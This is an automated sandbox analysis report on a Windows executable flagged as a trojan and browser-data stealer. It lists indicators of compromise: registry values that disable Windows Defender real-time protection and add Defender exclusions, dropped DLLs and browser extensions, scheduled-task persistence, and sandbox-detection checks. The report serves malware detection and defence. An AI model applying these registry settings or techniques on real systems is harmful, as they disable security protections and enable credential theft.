49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a

Analysis

max time kernel
229s
max time network
230s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
25-04-2024 02:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe
Size

6.7MB
MD5

a134c160036c6542be45ba9fc2d8132d
SHA1

d029bc9dd75936b64e007fe638c26a4fcc0fb1c3
SHA256

49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a
SHA512

b014a271fe2431905c0698fb442f91d7d936b97df17912c2068607ff36f72bb3e3344153f90b910248b4ff82681527347bc0575a7b73ae64a8e9b637137f6f41
SSDEEP

196608:91OT2zjVpYD8vDwJmaHxbS2Os9qP0eEVV2:3OT2tpRvDqRbhOZ0fVV2

Score

10^/10

discovery evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\heXdjphsLYtTYYrU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OJLDvKxDU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jDcnSjPvYahU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vGrfpbVBjyUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\heXdjphsLYtTYYrU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\mMAjWdbxOIjSziVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qpZxqHvFKXpRC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vGrfpbVBjyUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\heXdjphsLYtTYYrU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OJLDvKxDU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qpZxqHvFKXpRC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\mMAjWdbxOIjSziVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\heXdjphsLYtTYYrU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jDcnSjPvYahU2 = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

23 2052 rundll32.exe

flow	pid	process
23	2052	rundll32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

ENLtPnS.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\International\Geo\Nation ENLtPnS.exe
Executes dropped EXE 3 IoCs

Processes:

Install.exehoytHDx.exeENLtPnS.exe

pid process

2940 Install.exe
560 hoytHDx.exe
2196 ENLtPnS.exe
Loads dropped DLL 8 IoCs

Processes:

49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exeInstall.exerundll32.exe

pid process

3000 49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe
2940 Install.exe
2940 Install.exe
2940 Install.exe
2052 rundll32.exe
2052 rundll32.exe
2052 rundll32.exe
2052 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\International\Geo\Nation	ENLtPnS.exe

pid	process
2940	Install.exe
560	hoytHDx.exe
2196	ENLtPnS.exe

pid	process
3000	49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe
2940	Install.exe
2940	Install.exe
2940	Install.exe
2052	rundll32.exe
2052	rundll32.exe
2052	rundll32.exe
2052	rundll32.exe

Drops Chrome extension 2 IoCs

Processes:

ENLtPnS.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	ENLtPnS.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	ENLtPnS.exe

Drops file in System32 directory 24 IoCs

Processes:

powershell.exehoytHDx.exepowershell.EXEpowershell.exepowershell.exeENLtPnS.exepowershell.EXEpowershell.exerundll32.exepowershell.EXE

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	hoytHDx.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	ENLtPnS.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ENLtPnS.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_F035812844FEE93DCDCC1CD3A7F24400	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	hoytHDx.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	hoytHDx.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	hoytHDx.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_F035812844FEE93DCDCC1CD3A7F24400	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_FAD4FA4BE5EA6E868132040E668F6C95	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1D54DE53BDE89F59AF362E74369EB397	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1D54DE53BDE89F59AF362E74369EB397	ENLtPnS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_FAD4FA4BE5EA6E868132040E668F6C95	ENLtPnS.exe

Drops file in Program Files directory 13 IoCs

Processes:

ENLtPnS.exe

description	ioc	process
File created	C:\Program Files (x86)\jDcnSjPvYahU2\KMpbJxQUyrnLz.dll	ENLtPnS.exe
File created	C:\Program Files (x86)\vGrfpbVBjyUn\PfVmFTB.dll	ENLtPnS.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	ENLtPnS.exe
File created	C:\Program Files (x86)\OJLDvKxDU\WglxdQC.xml	ENLtPnS.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	ENLtPnS.exe
File created	C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\dqHYXrW.dll	ENLtPnS.exe
File created	C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\CyfRYWx.xml	ENLtPnS.exe
File created	C:\Program Files (x86)\qpZxqHvFKXpRC\unmoxqC.xml	ENLtPnS.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	ENLtPnS.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	ENLtPnS.exe
File created	C:\Program Files (x86)\qpZxqHvFKXpRC\rnzFssV.dll	ENLtPnS.exe
File created	C:\Program Files (x86)\OJLDvKxDU\MbxUrL.dll	ENLtPnS.exe
File created	C:\Program Files (x86)\jDcnSjPvYahU2\BVREnAE.xml	ENLtPnS.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\qXnxKrbPbFSTFetyh.job	schtasks.exe
File created	C:\Windows\Tasks\ZPVskaMeORyUtyn.job	schtasks.exe
File created	C:\Windows\Tasks\EJKQCvUwFyvoZzoaf.job	schtasks.exe
File created	C:\Windows\Tasks\bwrroZoeZRoQVpyAcj.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2908	schtasks.exe
936	schtasks.exe
2444	schtasks.exe
1664	schtasks.exe
1264	schtasks.exe
2768	schtasks.exe
2892	schtasks.exe
2516	schtasks.exe
904	schtasks.exe
2780	schtasks.exe
2680	schtasks.exe
2340	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

hoytHDx.exeENLtPnS.exewscript.exepowershell.exerundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	hoytHDx.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2e-96-84-d1-29-b2\WpadDecisionReason = "1"	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	ENLtPnS.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70ea697cb596da01	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	ENLtPnS.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2e-96-84-d1-29-b2\WpadDetectedUrl	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	ENLtPnS.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1575C79D-C529-4573-8DF3-BB25EFC223B5}\WpadNetworkName = "Network 3"	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1575C79D-C529-4573-8DF3-BB25EFC223B5}\2e-96-84-d1-29-b2	ENLtPnS.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	ENLtPnS.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ENLtPnS.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1575C79D-C529-4573-8DF3-BB25EFC223B5}\WpadDecisionReason = "1"	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	ENLtPnS.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2e-96-84-d1-29-b2\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	ENLtPnS.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1575C79D-C529-4573-8DF3-BB25EFC223B5}\WpadDecisionTime = 309a9d8db596da01	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	ENLtPnS.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2e-96-84-d1-29-b2\WpadDecisionTime = 309a9d8db596da01	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1575C79D-C529-4573-8DF3-BB25EFC223B5}\2e-96-84-d1-29-b2	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	hoytHDx.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1575C79D-C529-4573-8DF3-BB25EFC223B5}	ENLtPnS.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2e-96-84-d1-29-b2\WpadDecisionTime = 309a9d8db596da01	ENLtPnS.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	ENLtPnS.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	ENLtPnS.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEENLtPnS.exepowershell.exepowershell.exe

pid	process
3016	powershell.exe
2284	powershell.EXE
2284	powershell.EXE
2284	powershell.EXE
2028	powershell.EXE
2028	powershell.EXE
2028	powershell.EXE
1760	powershell.exe
1916	powershell.EXE
1916	powershell.EXE
1916	powershell.EXE
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
1724	powershell.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2392	powershell.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe
2196	ENLtPnS.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

Processes:

powershell.exeWMIC.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEpowershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeIncreaseQuotaPrivilege	2676	WMIC.exe
Token: SeSecurityPrivilege	2676	WMIC.exe
Token: SeTakeOwnershipPrivilege	2676	WMIC.exe
